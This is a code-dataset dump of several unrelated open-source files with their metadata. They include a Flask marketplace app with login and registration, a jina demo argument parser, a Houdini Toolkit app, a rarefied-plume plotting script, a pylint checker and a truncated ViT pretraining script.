register_date=time.strftime('%Y-%m-%d %H:%M:%S'))
db.session.add(new_user)
db.session.commit()
session.pop('_flashes', None)
flash('Welcome to flippin!\nYour account has been successfully created.', 'success')
return redirect(url_for('index'))
return render_template('register.html', form=form)
# homepage
@application.route('/')
def index():
return render_template('home.html')
# login user. does not use wtforms since little validation needs to be done.
@application.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
# get user information and query database for match
username = request.form['username']
password_candidate = request.form['password']
result = Users.query.filter_by(username=username).first()
# if info is correct redirect and set session variables
if result is not None:
password = result.password
if sha256_crypt.verify(password_candidate, password):
session['logged_in'] = True
session['username'] = username
session['city'] = result.city
# gets the related city name given the users relevant foreign key
session['city_name'] = Cities.query.filter_by(id=result.city).first().name
flash('Log in successful. Enjoy!', 'success')
return redirect(url_for('items'))
# otherwise return relevant error
else:
return render_template('login.html', error="Invalid password")
else:
return render_template('login.html', error="No user found")
return render_template('login.html')
# items page, requires that user is logged in
@application.route('/items')
@is_logged_in
def items():
listings = Listings.query.filter_by(city=session['city']).all()
return render_template('items.html', items=listings, length=len(listings))
@application.route('/profile', methods=['GET', 'POST'])
@is_logged_in
def profile():
form = ProfileForm(request.form)
user = Users.query.filter_by(username=session['username']).first()
if request.method == 'POST' and form.validate():
user.email = form.email.data
user.city = form.city.data
user.password = sha256_crypt.encrypt(str(form.password.data))
session['city'] = form.city.data
db.session.commit()
flash('Your account settings have been updated.', 'success')
return redirect(url_for('profile'))
return render_template('profile.html', user=user, form=form)
@application.route('/delete')
@is_logged_in
def delete_user():
db.session.query(Users).filter(Users.username == session['username']).delete()
db.session.commit()
session.clear()
flash('Your account has been deleted! Sorry to see you go.', 'success')
return render_template('home.html')
# logout method, clear session variables and redirect
@application.route('/logout')
def logout():
session.clear()
flash('You are now logged out', 'success')
return redirect(url_for('login'))
# contact page
@application.route('/contact', methods=['GET', 'POST'])
def contact():
form = ContactForm(request.form)
# on submit send email with form contents to and from support email
if request.method == 'POST' and form.validate():
# don't need to specify sender, default is in app config
msg = Message(form.subject.data, sender="support@flippinapp.com",
recipients=["support@flippinapp.com"])
msg.body = """
From: %s <%s>
About: %s
%s
""" % (form.name.data, form.email.data, form.subject.data, form.message.data)
mail.send(msg)
flash('Thanks for reaching out! We will get back to you shortly.', 'success')
return render_template('contact.html', form=form)
if __name__ == '__main__':
application.run()
| 37.698113
| 92
| 0.649983
|
from flask import Flask, render_template, request, flash, redirect, url_for, session
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Message, Mail
from passlib.hash import sha256_crypt
from functools import wraps
import requests
import time
application = Flask(__name__)
application.config.from_object('config.AWSConfig')
db = SQLAlchemy(application)
mail = Mail()
mail.init_app(application)
from models import Cities, Users, Listings
from forms import RegisterForm, ContactForm, ProfileForm
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash ("Please login to see this content.", "danger")
return redirect(url_for('login'))
return wrap
@application.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
recommendation = requests.get('https://www.passwordrandom.com/query?command=password')\
.content.decode("utf-8")
ip = requests.get('https://www.passwordrandom.com/query?command=ip').\
content.decode("utf-8")
flash("We recommend using password: '%s'" % recommendation, 'warning')
if request.method == 'POST' and form.validate():
new_user = Users(first=form.first.data,
last=form.last.data,
email=form.email.data,
username=form.username.data,
city=form.city.data,
password=sha256_crypt.encrypt(str(form.password.data)),
ip=ip,
register_date=time.strftime('%Y-%m-%d %H:%M:%S'))
db.session.add(new_user)
db.session.commit()
session.pop('_flashes', None)
flash('Welcome to flippin!\nYour account has been successfully created.', 'success')
return redirect(url_for('index'))
return render_template('register.html', form=form)
@application.route('/')
def index():
return render_template('home.html')
@application.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form['username']
password_candidate = request.form['password']
result = Users.query.filter_by(username=username).first()
if result is not None:
password = result.password
if sha256_crypt.verify(password_candidate, password):
session['logged_in'] = True
session['username'] = username
session['city'] = result.city
session['city_name'] = Cities.query.filter_by(id=result.city).first().name
flash('Log in successful. Enjoy!', 'success')
return redirect(url_for('items'))
else:
return render_template('login.html', error="Invalid password")
else:
return render_template('login.html', error="No user found")
return render_template('login.html')
@application.route('/items')
@is_logged_in
def items():
listings = Listings.query.filter_by(city=session['city']).all()
return render_template('items.html', items=listings, length=len(listings))
@application.route('/profile', methods=['GET', 'POST'])
@is_logged_in
def profile():
form = ProfileForm(request.form)
user = Users.query.filter_by(username=session['username']).first()
if request.method == 'POST' and form.validate():
user.email = form.email.data
user.city = form.city.data
user.password = sha256_crypt.encrypt(str(form.password.data))
session['city'] = form.city.data
db.session.commit()
flash('Your account settings have been updated.', 'success')
return redirect(url_for('profile'))
return render_template('profile.html', user=user, form=form)
@application.route('/delete')
@is_logged_in
def delete_user():
db.session.query(Users).filter(Users.username == session['username']).delete()
db.session.commit()
session.clear()
flash('Your account has been deleted! Sorry to see you go.', 'success')
return render_template('home.html')
@application.route('/logout')
def logout():
session.clear()
flash('You are now logged out', 'success')
return redirect(url_for('login'))
@application.route('/contact', methods=['GET', 'POST'])
def contact():
form = ContactForm(request.form)
if request.method == 'POST' and form.validate():
msg = Message(form.subject.data, sender="support@flippinapp.com",
recipients=["support@flippinapp.com"])
msg.body = """
From: %s <%s>
About: %s
%s
""" % (form.name.data, form.email.data, form.subject.data, form.message.data)
mail.send(msg)
flash('Thanks for reaching out! We will get back to you shortly.', 'success')
return render_template('contact.html', form=form)
if __name__ == '__main__':
application.run()
| true
| true
|
f70b3e78a726fa7daeafb49f4ec49e13ef4467c9
| 3,463
|
py
|
Python
|
jina/parsers/helloworld.py
|
ryan-zheng-teki/jina
|
042175fdb7e3ed8d9dd17233231beb2a8c2004bf
|
[
"Apache-2.0"
] | null | null | null |
jina/parsers/helloworld.py
|
ryan-zheng-teki/jina
|
042175fdb7e3ed8d9dd17233231beb2a8c2004bf
|
[
"Apache-2.0"
] | null | null | null |
jina/parsers/helloworld.py
|
ryan-zheng-teki/jina
|
042175fdb7e3ed8d9dd17233231beb2a8c2004bf
|
[
"Apache-2.0"
] | null | null | null |
from pkg_resources import resource_filename
from .base import set_base_parser
from .helper import add_arg_group
from ..helper import get_random_identity
def set_hw_parser(parser=None):
if not parser:
parser = set_base_parser()
gp = add_arg_group(parser, title='General')
gp.add_argument('--workdir', type=str, default=get_random_identity(),
help='the workdir for hello-world demo, '
'all data, indices, shards and outputs will be saved there')
gp.add_argument('--logserver', action='store_true', default=False,
help='start a log server for the dashboard')
gp.add_argument('--logserver-config', type=str,
default=resource_filename('jina',
'/'.join(('resources', 'logserver.default.yml'))),
help='the yaml config of the log server')
gp.add_argument('--download-proxy', type=str,
help='specify the proxy when downloading sample data')
gp = add_arg_group(parser, title='Scalability')
gp.add_argument('--shards', type=int,
default=2,
help='number of shards when index and query')
gp.add_argument('--parallel', type=int,
default=2,
help='number of parallel when index and query')
gp = add_arg_group(parser, title='Index')
gp.add_argument('--uses-index', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.index.yml'))),
help='the yaml path of the index flow')
gp.add_argument('--index-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
help='the url of index data (should be in idx3-ubyte.gz format)')
gp.add_argument('--index-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
help='the url of index labels data (should be in idx3-ubyte.gz format)')
gp.add_argument('--index-batch-size', type=int,
default=1024,
help='the batch size in indexing')
gp = add_arg_group(parser, title='Search')
gp.add_argument('--uses-query', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.query.yml'))),
help='the yaml path of the query flow')
gp.add_argument('--query-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
help='the url of query data (should be in idx3-ubyte.gz format)')
gp.add_argument('--query-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
help='the url of query labels data (should be in idx3-ubyte.gz format)')
gp.add_argument('--query-batch-size', type=int,
default=32,
help='the batch size in searching')
gp.add_argument('--num-query', type=int, default=128,
help='number of queries to visualize')
gp.add_argument('--top-k', type=int, default=50,
help='top-k results to retrieve and visualize')
return parser
| 54.109375
| 116
| 0.597748
|
from pkg_resources import resource_filename
from .base import set_base_parser
from .helper import add_arg_group
from ..helper import get_random_identity
def set_hw_parser(parser=None):
if not parser:
parser = set_base_parser()
gp = add_arg_group(parser, title='General')
gp.add_argument('--workdir', type=str, default=get_random_identity(),
help='the workdir for hello-world demo, '
'all data, indices, shards and outputs will be saved there')
gp.add_argument('--logserver', action='store_true', default=False,
help='start a log server for the dashboard')
gp.add_argument('--logserver-config', type=str,
default=resource_filename('jina',
'/'.join(('resources', 'logserver.default.yml'))),
help='the yaml config of the log server')
gp.add_argument('--download-proxy', type=str,
help='specify the proxy when downloading sample data')
gp = add_arg_group(parser, title='Scalability')
gp.add_argument('--shards', type=int,
default=2,
help='number of shards when index and query')
gp.add_argument('--parallel', type=int,
default=2,
help='number of parallel when index and query')
gp = add_arg_group(parser, title='Index')
gp.add_argument('--uses-index', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.index.yml'))),
help='the yaml path of the index flow')
gp.add_argument('--index-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
help='the url of index data (should be in idx3-ubyte.gz format)')
gp.add_argument('--index-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
help='the url of index labels data (should be in idx3-ubyte.gz format)')
gp.add_argument('--index-batch-size', type=int,
default=1024,
help='the batch size in indexing')
gp = add_arg_group(parser, title='Search')
gp.add_argument('--uses-query', type=str,
default=resource_filename('jina', '/'.join(('resources', 'helloworld.flow.query.yml'))),
help='the yaml path of the query flow')
gp.add_argument('--query-data-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
help='the url of query data (should be in idx3-ubyte.gz format)')
gp.add_argument('--query-labels-url', type=str,
default='http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
help='the url of query labels data (should be in idx3-ubyte.gz format)')
gp.add_argument('--query-batch-size', type=int,
default=32,
help='the batch size in searching')
gp.add_argument('--num-query', type=int, default=128,
help='number of queries to visualize')
gp.add_argument('--top-k', type=int, default=50,
help='top-k results to retrieve and visualize')
return parser
| true
| true
|
f70b3f7012f084ba3f391beabb56936491ed1b59
| 3,833
|
py
|
Python
|
install/app_store/tk-houdini-mantranode/v0.3.0/app.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | 4
|
2019-01-11T03:41:28.000Z
|
2019-09-12T06:57:17.000Z
|
bundle_cache/app_store/tk-houdini-mantranode/v0.3.1/app.py
|
ColinKennedy/tk-config-default2-respawn
|
855fb8033daa549b92615792442f19a7f9c4f55c
|
[
"Linux-OpenIB"
] | null | null | null |
bundle_cache/app_store/tk-houdini-mantranode/v0.3.1/app.py
|
ColinKennedy/tk-config-default2-respawn
|
855fb8033daa549b92615792442f19a7f9c4f55c
|
[
"Linux-OpenIB"
] | 2
|
2019-01-10T05:00:18.000Z
|
2020-02-15T16:32:56.000Z
|
# Copyright (c) 2015 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""
Mantra Output node App for use with Toolkit's Houdini engine.
"""
import sgtk
class TkMantraNodeApp(sgtk.platform.Application):
"""The Mantra Output Node."""
def init_app(self):
"""Initialize the app."""
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
self.handler = tk_houdini_mantra.TkMantraNodeHandler(self)
def convert_to_regular_mantra_nodes(self):
"""Convert Toolkit Mantra nodes to regular Mantra nodes.
Convert all Tooklit Mantra nodes found in the current script to
regular Mantra nodes. Additional Toolkit information will be stored in
user data named 'tk_*'
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> app.convert_to_regular_mantra_nodes()
"""
self.log_debug(
"Converting Toolkit Mantra nodes to built-in Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_to_regular_mantra_nodes(self)
def convert_back_to_tk_mantra_nodes(self):
"""Convert regular Mantra nodes back to Toolkit Mantra nodes.
Convert any regular Mantra nodes that were previously converted
from Toolkit Mantra nodes back into Toolkit Mantra nodes.
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> app.convert_back_to_tk_mantra_nodes()
"""
self.log_debug(
"Converting built-in Mantra nodes back to Toolkit Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_back_to_tk_mantra_nodes(self)
def get_nodes(self):
"""
Returns a list of hou.node objects for each tk mantra node.
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> tk_mantra_nodes = app.get_nodes()
"""
self.log_debug("Retrieving tk-houdini-mantra nodes...")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
nodes = tk_houdini_mantra.TkMantraNodeHandler.\
get_all_tk_mantra_nodes()
self.log_debug("Found %s tk-houdini-mantra nodes." % (len(nodes),))
return nodes
def get_output_path(self, node):
"""
Returns the evaluated output path for the supplied node.
Example usage::
>>> import sgtk
>>> eng = sgtk.platform.current_engine()
>>> app = eng.apps["tk-houdini-mantranode"]
>>> output_path = app.get_output_path(tk_mantra_node)
"""
self.log_debug("Retrieving output path for %s" % (node,))
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
output_path = tk_houdini_mantra.TkMantraNodeHandler.\
get_output_path(node)
self.log_debug("Retrieved output path: %s" % (output_path,))
return output_path
def get_work_file_template(self):
"""
Returns the configured work file template for the app.
"""
return self.get_template("work_file_template")
| 33.920354
| 78
| 0.663449
|
import sgtk
class TkMantraNodeApp(sgtk.platform.Application):
def init_app(self):
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
self.handler = tk_houdini_mantra.TkMantraNodeHandler(self)
def convert_to_regular_mantra_nodes(self):
self.log_debug(
"Converting Toolkit Mantra nodes to built-in Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_to_regular_mantra_nodes(self)
def convert_back_to_tk_mantra_nodes(self):
self.log_debug(
"Converting built-in Mantra nodes back to Toolkit Mantra nodes.")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
tk_houdini_mantra.TkMantraNodeHandler.\
convert_back_to_tk_mantra_nodes(self)
def get_nodes(self):
self.log_debug("Retrieving tk-houdini-mantra nodes...")
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
nodes = tk_houdini_mantra.TkMantraNodeHandler.\
get_all_tk_mantra_nodes()
self.log_debug("Found %s tk-houdini-mantra nodes." % (len(nodes),))
return nodes
def get_output_path(self, node):
self.log_debug("Retrieving output path for %s" % (node,))
tk_houdini_mantra = self.import_module("tk_houdini_mantranode")
output_path = tk_houdini_mantra.TkMantraNodeHandler.\
get_output_path(node)
self.log_debug("Retrieved output path: %s" % (output_path,))
return output_path
def get_work_file_template(self):
return self.get_template("work_file_template")
| true
| true
|
f70b419f55fd62b2aff2ff85eee6f57f67a7d0d8
| 2,647
|
py
|
Python
|
cases/1d/graphCaseValidation.py
|
andytorrestb/rarefiedPlume
|
c09234c701c395d16519d8a361eae17540711530
|
[
"MIT"
] | null | null | null |
cases/1d/graphCaseValidation.py
|
andytorrestb/rarefiedPlume
|
c09234c701c395d16519d8a361eae17540711530
|
[
"MIT"
] | null | null | null |
cases/1d/graphCaseValidation.py
|
andytorrestb/rarefiedPlume
|
c09234c701c395d16519d8a361eae17540711530
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
# Find path for cases
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
# print(curr_dir_path)
# cases = os.listdir(curr_dir_path + '/Cases')
# pop = cases.index('baseCase')
# cases.pop(pop)
# Label graph with bold characters
font_axis_publish = {
'color': 'black',
'weight': 'bold',
'size': 22,
}
# Read in digitized data
digi_n = pd.read_csv(
curr_dir_path + '/n_nstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
curr_dir_path + '/T_Tstar_radius_DAC.dat',
header = 0,
sep = '\t',
names = ['r', 'T_Tstar']
)
# Read in simulated data.
sim = pd.read_csv(
curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
# Used to see what the values trend to.
print(sim['Ttra_Ar'])
sim = sim[['x', 'rhoN_Ar', 'Ttra_Ar']].dropna()
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 8.377e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 1000.0
# Producde Analytical Data
def TTt_Ma(Ma, ga = 1.4):
return (ga + 1) / (2 + (ga - 1) * Ma ** 2)
def rrt_Ma(Ma, ga = 1.4):
rrt = (1 / TTt_Ma(Ma, ga)) ** ((ga + 1) / (ga - 1))
rrt = np.sqrt(np.sqrt(rrt) / Ma)
return rrt
def nnt_Ma(Ma, ga = 1.4):
return TTt_Ma(Ma, ga) ** (1 / (ga - 1))
def a(T, ga = 1.4, R = 287):
return np.sqrt(ga * R * T)
Ma_domain = np.linspace(1, 25, 100)
ga = 1.67
TTt = TTt_Ma(Ma_domain, ga = ga)
rrt = rrt_Ma(Ma_domain, ga = ga)
nnt = nnt_Ma(Ma_domain, ga = ga)
print("Printing rrt")
print(rrt)
# Graph Results
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['rhoN_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, nnt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-4, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['Ttra_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, TTt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-3, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| 27.010204
| 87
| 0.649792
|
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
curr_dir_path = os.path.dirname(os.path.realpath(__file__))
font_axis_publish = {
'color': 'black',
'weight': 'bold',
'size': 22,
}
digi_n = pd.read_csv(
curr_dir_path + '/n_nstar_radius.dat',
header = 0,
sep = '\t',
names = ['r', 'n_nstar']
)
digi_T = pd.read_csv(
curr_dir_path + '/T_Tstar_radius_DAC.dat',
header = 0,
sep = '\t',
names = ['r', 'T_Tstar']
)
sim = pd.read_csv(
curr_dir_path + '/postProcessing/sampleDict/0.3/horizontalLine_Ttra_Ar_rhoN_Ar.csv'
)
print(sim['Ttra_Ar'])
sim = sim[['x', 'rhoN_Ar', 'Ttra_Ar']].dropna()
sim['rhoN_Ar'] = sim['rhoN_Ar'] / 8.377e20
sim['Ttra_Ar'] = sim['Ttra_Ar'] / 1000.0
def TTt_Ma(Ma, ga = 1.4):
return (ga + 1) / (2 + (ga - 1) * Ma ** 2)
def rrt_Ma(Ma, ga = 1.4):
rrt = (1 / TTt_Ma(Ma, ga)) ** ((ga + 1) / (ga - 1))
rrt = np.sqrt(np.sqrt(rrt) / Ma)
return rrt
def nnt_Ma(Ma, ga = 1.4):
return TTt_Ma(Ma, ga) ** (1 / (ga - 1))
def a(T, ga = 1.4, R = 287):
return np.sqrt(ga * R * T)
Ma_domain = np.linspace(1, 25, 100)
ga = 1.67
TTt = TTt_Ma(Ma_domain, ga = ga)
rrt = rrt_Ma(Ma_domain, ga = ga)
nnt = nnt_Ma(Ma_domain, ga = ga)
print("Printing rrt")
print(rrt)
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('n/n*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['rhoN_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_n['r'], digi_n['n_nstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, nnt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-4, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_n.png')
plt.close()
plt.title('OpenFOAM vs DAC', fontdict = font_axis_publish)
plt.ylabel('T/T*', fontdict = font_axis_publish)
plt.xlabel('Radial distance, r (m)', fontdict = font_axis_publish)
plt.plot(sim['x'], sim['Ttra_Ar'], label = 'OpenFOAM (Torres, Pitt, Kinzel)')
plt.plot(digi_T['r'], digi_T['T_Tstar'], label = 'DAC (Lumpkin, Stewart)')
plt.plot(rrt, TTt, label = 'Analytical Solution')
plt.legend()
plt.yscale('log')
plt.ylim(bottom = 1e-3, top = 1)
plt.savefig(curr_dir_path + '/digitized_vs_analytical_T.png')
plt.close()
| true
| true
|
f70b420d90436b97dbaad27536f9a5d01d87e845
| 842
|
py
|
Python
|
github/content/licenserule.py
|
ShineyDev/github
|
fbc7a3f66af34350c754e2d8b278ef419d0296b9
|
[
"Apache-2.0"
] | 2
|
2021-04-24T10:54:12.000Z
|
2021-07-08T08:26:58.000Z
|
github/content/licenserule.py
|
ShineyDev/github
|
fbc7a3f66af34350c754e2d8b278ef419d0296b9
|
[
"Apache-2.0"
] | null | null | null |
github/content/licenserule.py
|
ShineyDev/github
|
fbc7a3f66af34350c754e2d8b278ef419d0296b9
|
[
"Apache-2.0"
] | 4
|
2019-07-09T23:23:36.000Z
|
2022-03-30T13:53:15.000Z
|
from github.interfaces import Type
class LicenseRule(Type):
"""
Represents a license rule.
"""
__slots__ = ()
_repr_fields = [
"key",
]
_graphql_fields = [
"description",
"key",
"label",
]
@property
def description(self):
"""
A description of the license rule.
:type: :class:`str`
"""
return self._get_field("description")
@property
def key(self):
"""
The machine-readable key of the license rule.
:type: :class:`str`
"""
return self._get_field("key")
@property
def label(self):
"""
The human-readable label of the license rule.
:type: :class:`str`
"""
return self._get_field("label")
__all__ = [
"LicenseRule",
]
| 15.309091
| 53
| 0.509501
|
from github.interfaces import Type
class LicenseRule(Type):
__slots__ = ()
_repr_fields = [
"key",
]
_graphql_fields = [
"description",
"key",
"label",
]
@property
def description(self):
return self._get_field("description")
@property
def key(self):
return self._get_field("key")
@property
def label(self):
return self._get_field("label")
__all__ = [
"LicenseRule",
]
| true
| true
|
f70b436846b47c3c69212de540878dd80838e8d3
| 2,621
|
py
|
Python
|
Lib/site-packages/pylint/extensions/check_elif.py
|
punithmadaiahkumar/try-django
|
39680a7583122bdd722789f92400edae67c6251d
|
[
"MIT"
] | 2
|
2022-01-06T23:31:00.000Z
|
2022-01-06T23:35:49.000Z
|
Lib/site-packages/pylint/extensions/check_elif.py
|
punithmadaiahkumar/try-django
|
39680a7583122bdd722789f92400edae67c6251d
|
[
"MIT"
] | null | null | null |
Lib/site-packages/pylint/extensions/check_elif.py
|
punithmadaiahkumar/try-django
|
39680a7583122bdd722789f92400edae67c6251d
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2016-2020 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2016 Glenn Matthews <glmatthe@cisco.com>
# Copyright (c) 2018 Ville Skyttä <ville.skytta@iki.fi>
# Copyright (c) 2019-2021 Pierre Sassoulas <pierre.sassoulas@gmail.com>
# Copyright (c) 2020 hippo91 <guillaume.peillex@gmail.com>
# Copyright (c) 2020 Anthony Sottile <asottile@umich.edu>
# Copyright (c) 2021 bot <bot@noreply.github.com>
# Copyright (c) 2021 Daniël van Noord <13665637+DanielNoord@users.noreply.github.com>
# Copyright (c) 2021 Marc Mueller <30130371+cdce8p@users.noreply.github.com>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/main/LICENSE
from astroid import nodes
from pylint.checkers import BaseTokenChecker
from pylint.checkers.utils import check_messages
from pylint.interfaces import HIGH, IAstroidChecker, ITokenChecker
class ElseifUsedChecker(BaseTokenChecker):
"""Checks for use of "else if" when an "elif" could be used"""
__implements__ = (ITokenChecker, IAstroidChecker)
name = "else_if_used"
msgs = {
"R5501": (
'Consider using "elif" instead of "else if"',
"else-if-used",
"Used when an else statement is immediately followed by "
"an if statement and does not contain statements that "
"would be unrelated to it.",
)
}
def __init__(self, linter=None):
super().__init__(linter)
self._init()
def _init(self):
self._elifs = {}
def process_tokens(self, tokens):
"""Process tokens and look for 'if' or 'elif'"""
self._elifs = {
begin: token for _, token, begin, _, _ in tokens if token in {"elif", "if"}
}
def leave_module(self, _: nodes.Module) -> None:
self._init()
@check_messages("else-if-used")
def visit_if(self, node: nodes.If) -> None:
"""Current if node must directly follow an 'else'"""
if (
isinstance(node.parent, nodes.If)
and node.parent.orelse == [node]
and (node.lineno, node.col_offset) in self._elifs
and self._elifs[(node.lineno, node.col_offset)] == "if"
):
self.add_message("else-if-used", node=node, confidence=HIGH)
def register(linter):
"""Required method to auto register this checker.
:param linter: Main interface object for Pylint plugins
:type linter: Pylint object
"""
linter.register_checker(ElseifUsedChecker(linter))
| 36.402778
| 87
| 0.662343
|
from astroid import nodes
from pylint.checkers import BaseTokenChecker
from pylint.checkers.utils import check_messages
from pylint.interfaces import HIGH, IAstroidChecker, ITokenChecker
class ElseifUsedChecker(BaseTokenChecker):
__implements__ = (ITokenChecker, IAstroidChecker)
name = "else_if_used"
msgs = {
"R5501": (
'Consider using "elif" instead of "else if"',
"else-if-used",
"Used when an else statement is immediately followed by "
"an if statement and does not contain statements that "
"would be unrelated to it.",
)
}
def __init__(self, linter=None):
super().__init__(linter)
self._init()
def _init(self):
self._elifs = {}
def process_tokens(self, tokens):
self._elifs = {
begin: token for _, token, begin, _, _ in tokens if token in {"elif", "if"}
}
def leave_module(self, _: nodes.Module) -> None:
self._init()
@check_messages("else-if-used")
def visit_if(self, node: nodes.If) -> None:
if (
isinstance(node.parent, nodes.If)
and node.parent.orelse == [node]
and (node.lineno, node.col_offset) in self._elifs
and self._elifs[(node.lineno, node.col_offset)] == "if"
):
self.add_message("else-if-used", node=node, confidence=HIGH)
def register(linter):
linter.register_checker(ElseifUsedChecker(linter))
| true
| true
|
f70b4427b05485de045681e5ad5ce916276873c7
| 5,002
|
py
|
Python
|
pretrain.py
|
nakashima-kodai/FractalDB_Pretrained_ViT_PyTorch
|
5d1df4023f05f5a8ff7e8a8810bf95119a0eeb96
|
[
"MIT"
] | 12
|
2021-05-22T12:13:32.000Z
|
2022-01-27T03:13:48.000Z
|
pretrain.py
|
nakashima-kodai/FractalDB_Pretrained_ViT_PyTorch
|
5d1df4023f05f5a8ff7e8a8810bf95119a0eeb96
|
[
"MIT"
] | null | null | null |
pretrain.py
|
nakashima-kodai/FractalDB_Pretrained_ViT_PyTorch
|
5d1df4023f05f5a8ff7e8a8810bf95119a0eeb96
|
[
"MIT"
] | null | null | null |
import os, sys
import math
import hydra
import torch
import timm
from hydra.utils import instantiate
from timm.loss import LabelSmoothingCrossEntropy, SoftTargetCrossEntropy
from timm.utils import NativeScaler
import models
from data import create_dataloader
from utils import MetricLogger, SmoothedValue
from utils import fix_random_seed
@hydra.main(config_path='./configs', config_name='pretrain')
def main(cfg):
if cfg.seed is not None:
fix_random_seed(cfg.seed)
torch.backends.cudnn.benchmark = True
# dataloader
trainloader, num_classes = create_dataloader(cfg.data)
# additional data augmentation (mixup/cutmix)
mixup_fn = None
mixup_enable = (cfg.data.mixup.mixup_alpha > 0.) or (cfg.data.mixup.cutmix_alpha > 0.)
if mixup_enable:
mixup_fn = instantiate(cfg.data.mixup, num_classes=num_classes)
print(f'MixUp/Cutmix was enabled\n')
# create model
model = instantiate(cfg.model, num_classes=num_classes)
print(f'Model[{cfg.model.model_name}] was created')
# wrap model with DP
model = torch.nn.parallel.DataParallel(model)
model.cuda()
model_without_dp = model.module
# optimizer
scaled_lr = cfg.optim.args.lr * cfg.data.loader.batch_size / 512.0
cfg.optim.args.lr = scaled_lr
optimizer = instantiate(cfg.optim, model=model)
print(f'Optimizer: \n{optimizer}\n')
# scheduler
lr_scheduler, _ = instantiate(cfg.scheduler, optimizer=optimizer)
print(f'Scheduler: \n{lr_scheduler}\n')
# criterion
